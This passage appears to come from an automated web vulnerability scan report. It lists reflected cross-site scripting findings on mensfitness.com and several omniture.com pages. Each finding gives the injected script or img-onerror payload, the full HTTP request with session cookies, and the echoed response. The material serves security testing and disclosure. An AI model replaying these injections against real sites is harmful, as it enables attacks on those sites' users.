GET /Tshirt_Workout9f9d9"><img%20src%3da%20onerror%3dalert(1)>35c645f95fa/fitness/ab_exercises/136?cid=RSS HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:45 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 1
Cache-Control: max-age=43199
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 02 Feb 2011 02:33:43 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107103 (MII-APC/1.6)
Connection: close
Content-Length: 45083

<html>
<head>

<title>The T-Shirt Body Workout - Men's Fitness</title>

<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest,
...[SNIP]...
<a href="/Tshirt_Workout9f9d9"><img src=a onerror=alert(1)>35c645f95fa/fitness/ab_exercises/136?page=2">
...[SNIP]...

4.445. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mensfitness.com
Path:	/Tshirt_Workout/fitness/ab_exercises/136

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d1605--><img%20src%3da%20onerror%3dalert(1)>266a0d1386d was submitted in the REST URL parameter 1. This input was echoed as d1605--><img src=a onerror=alert(1)>266a0d1386d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /Tshirt_Workoutd1605--><img%20src%3da%20onerror%3dalert(1)>266a0d1386d/fitness/ab_exercises/136?cid=RSS HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:50 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 0
Cache-Control: max-age=43199
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 02 Feb 2011 02:33:49 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107104 (MII-APC/1.6)
Connection: close
Content-Length: 45087

<html>
<head>

<title>The T-Shirt Body Workout - Men's Fitness</title>

<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest,
...[SNIP]...
<a href="/Tshirt_Workoutd1605--><img src=a onerror=alert(1)>266a0d1386d/fitness/ab_exercises/136?page=2">
...[SNIP]...

4.446. http://www.omniture.com/en/community/blogs [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/community/blogs

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload e9e56--><script>alert(1)</script>8a737b00cb1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/community/blogse9e56--><script>alert(1)</script>8a737b00cb1 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:16:04 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:16:04 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:16:04 GMT
Content-Length: 22183
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:16:04 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Community | Online Business Opt
...[SNIP]...
<script>alert(1)</script>8a737b00cb1 cached on 2 February 2011 at 11:16:04 PST (75162e068e66d479485cee21e59fe2be) -->
...[SNIP]...

4.447. http://www.omniture.com/en/community/customers.omniture.com [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/community/customers.omniture.com

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 7144c--><script>alert(1)</script>b7eed20f598 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/community/customers.omniture.com7144c--><script>alert(1)</script>b7eed20f598 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:16:04 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:16:04 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:16:04 GMT
Content-Length: 22215
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:16:04 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Community | Online Business Opt
...[SNIP]...
<script>alert(1)</script>b7eed20f598 cached on 2 February 2011 at 11:16:04 PST (b1f612dbc20a2cb73ea256efbcd7c9d5) -->
...[SNIP]...

4.448. http://www.omniture.com/en/community/developer [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/community/developer

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 2c4b9--><script>alert(1)</script>7d4a341ee32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/community/developer2c4b9--><script>alert(1)</script>7d4a341ee32 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:15:42 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:15:42 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:15:42 GMT
Content-Length: 22191
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:42 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Community | Online Business Opt
...[SNIP]...
<script>alert(1)</script>7d4a341ee32 cached on 2 February 2011 at 11:15:42 PST (0dd32b264ef8e7839f14b536c65df663) -->
...[SNIP]...

4.449. http://www.omniture.com/en/community/events [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/community/events

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload dc1e8--><script>alert(1)</script>227c082ad36 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/community/eventsdc1e8--><script>alert(1)</script>227c082ad36 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:15:35 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:15:35 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:15:35 GMT
Content-Length: 22185
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:35 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Community | Online Business Opt
...[SNIP]...
<script>alert(1)</script>227c082ad36 cached on 2 February 2011 at 11:15:35 PST (d26fa80fb633eb8d32262dbc6e0bbc27) -->
...[SNIP]...

4.450. http://www.omniture.com/en/community/usergroups [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/community/usergroups

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload f80cc--><script>alert(1)</script>67c63f45b27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/community/usergroupsf80cc--><script>alert(1)</script>67c63f45b27 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:16:46 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:16:46 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:16:46 GMT
Content-Length: 22193
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:16:46 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Community | Online Business Opt
...[SNIP]...
<script>alert(1)</script>67c63f45b27 cached on 2 February 2011 at 11:16:45 PST (ac9ba81c0d7305ddb46e7643ef96d89f) -->
...[SNIP]...

4.451. http://www.omniture.com/en/company/adobe_faq [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/adobe_faq

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 6efac--><script>alert(1)</script>7a7b46fb32b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/company/adobe_faq6efac--><script>alert(1)</script>7a7b46fb32b HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:48:29 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:48:29 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:48:29 GMT
Content-Length: 27655
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:48:29 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Corporate Overview | Online Bus
...[SNIP]...
<script>alert(1)</script>7a7b46fb32b cached on 2 February 2011 at 21:48:28 PST (413597e51bd47bb907871a6992df8c75) -->
...[SNIP]...

4.452. http://www.omniture.com/en/company/analyst_insight [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/analyst_insight

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload ef00c--><script>alert(1)</script>4d4bdbca291 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/company/analyst_insightef00c--><script>alert(1)</script>4d4bdbca291 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:52:23 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:52:23 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:52:23 GMT
Content-Length: 27667
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:52:23 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Corporate Overview | Online Bus
...[SNIP]...
<script>alert(1)</script>4d4bdbca291 cached on 2 February 2011 at 21:52:23 PST (7ac57489a0d7a746a6e1f67c08bdca49) -->
...[SNIP]...

4.453. http://www.omniture.com/en/company/customers [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/customers

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload a57bc--><script>alert(1)</script>b2491e7fc39 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/company/customersa57bc--><script>alert(1)</script>b2491e7fc39 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:49:55 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:49:55 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:49:56 GMT
Content-Length: 27655
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:49:55 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Corporate Overview | Online Bus
...[SNIP]...
<script>alert(1)</script>b2491e7fc39 cached on 2 February 2011 at 21:49:55 PST (0960645865d37a6f4057cf3e3adf691b) -->
...[SNIP]...

4.454. http://www.omniture.com/en/company/press_room [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload f5b9d--><script>alert(1)</script>41f5b79ce88 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/company/press_roomf5b9d--><script>alert(1)</script>41f5b79ce88 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:47:56 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:47:56 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:47:56 GMT
Content-Length: 27657
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:47:56 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Corporate Overview | Online Bus
...[SNIP]...
<script>alert(1)</script>41f5b79ce88 cached on 2 February 2011 at 21:47:56 PST (99f9fbb0ec3c8761c5775e4b308a43d7) -->
...[SNIP]...

4.455. http://www.omniture.com/en/company/press_room/awards [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room/awards

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 28450--><script>alert(1)</script>48a8e156b78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/company/press_room28450--><script>alert(1)</script>48a8e156b78/awards HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:49:07 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:49:07 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:49:07 GMT
Content-Length: 27671
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:49:07 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Corporate Overview | Online Bus
...[SNIP]...
<script>alert(1)</script>48a8e156b78/awards cached on 2 February 2011 at 21:49:07 PST (67b75c3a7a72e61e08dc7a75ef71608e) -->
...[SNIP]...

4.456. http://www.omniture.com/en/company/press_room/awards [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room/awards

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload c3bd4--><script>alert(1)</script>3004f97382 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/company/press_room/awardsc3bd4--><script>alert(1)</script>3004f97382 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

